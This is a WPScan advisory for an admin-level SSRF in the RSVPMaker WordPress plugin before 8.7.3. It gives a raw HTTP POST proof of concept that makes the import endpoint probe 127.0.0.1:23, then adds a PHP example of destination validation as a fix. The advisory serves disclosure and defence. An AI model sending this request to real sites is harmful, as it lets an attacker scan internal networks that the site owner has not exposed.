wpvulndb WPVDB-ID:63BE225C-EBEE-4CAC-B43E-CF033EE7425D
History: Jun 29, 2021 - 12:00 a.m.

RSVPMaker < 8.7.3 - Authenticated (admin+) SSRF

2021-06-29 00:00:00
wpscan.com
7

The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes a URL as input and calls curl on it without first validating it to ensure it’s a remote one. As a result, a high-privilege user could use that feature to scan the internal network via an SSRF attack.

PoC

Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click ‘Import’.

    POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1
    Host: 172.28.128.50
    Content-Length: 52
    Accept: */*
    X-Requested-With: XMLHttpRequest
    X-WP-Nonce: b56e26b3f8
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://172.28.128.50
    Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen
    Accept-Language: en-US,en;q=0.9
    Cookie: [admin cookies]
    Connection: close

    importrsvp=http%3A%2F%2F127.0.0.1%3A23&start=0

Response:

    cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused
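The destination check the description says is missing, as an added PHP example (not RSVPMaker's code or its 8.7.3 fix): vet the URL before curl is called and pin the connection to the address that was vetted. `safe_import_target()` and its `$resolve` parameter are hypothetical names, the hostnames and DNS answers are constructed, and PHP 7.4+ with the curl extension is assumed.

```php
<?php
// Added example (not RSVPMaker code). safe_import_target() and $resolve are
// hypothetical names; needs PHP 7.4+ with the curl extension.
// Returns cURL options for a vetted public destination, or null to refuse.
// $resolve maps a hostname to IPv4 strings (default gethostbynamel, A records only).
function safe_import_target(string $url, ?callable $resolve = null): ?array
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;                      // an import source is http(s) only
    }
    $host = trim($parts['host'], '[]');   // parse_url keeps IPv6 brackets
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    $literal = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $ips = $literal ? [$host] : (($resolve ?? 'gethostbynamel')($host) ?: []);
    if ($ips === []) {
        return null;                      // unresolvable
    }
    $public = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) {
        // Refuse if ANY answer is loopback, RFC 1918, link-local or reserved.
        if (filter_var($ip, FILTER_VALIDATE_IP, $public) === false) {
            return null;
        }
    }
    $opts = [
        CURLOPT_URL            => $url,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,  // a redirect would skip this check
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => 10,
    ];
    if (!$literal) {
        // Pin the name to the vetted address so curl's own lookup cannot
        // return something different from what was checked.
        $opts[CURLOPT_RESOLVE] = ["$host:$port:{$ips[0]}"];
    }
    return $opts;
}

// Constructed DNS answers and URLs; the first URL is the one in the PoC request.
$dns = fn(string $h) => ['intranet.example' => ['10.0.0.5'], 'events.example' => ['93.184.216.34']][$h] ?? false;
foreach (['http://127.0.0.1:23', 'http://intranet.example/', 'ftp://events.example/x', 'https://events.example/feed.json'] as $u) {
    printf("%-34s %s\n", $u, safe_import_target($u, $dns) ? 'allowed' : 'blocked');
}
```

Inside WordPress, `wp_safe_remote_get()` applies core's own URL validation (`wp_http_validate_url()`) before making the request, so plugin code that fetches user-supplied URLs can use it rather than calling curl directly.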

CPE

Name       Operator  Version
rsvpmaker  lt        8.7.3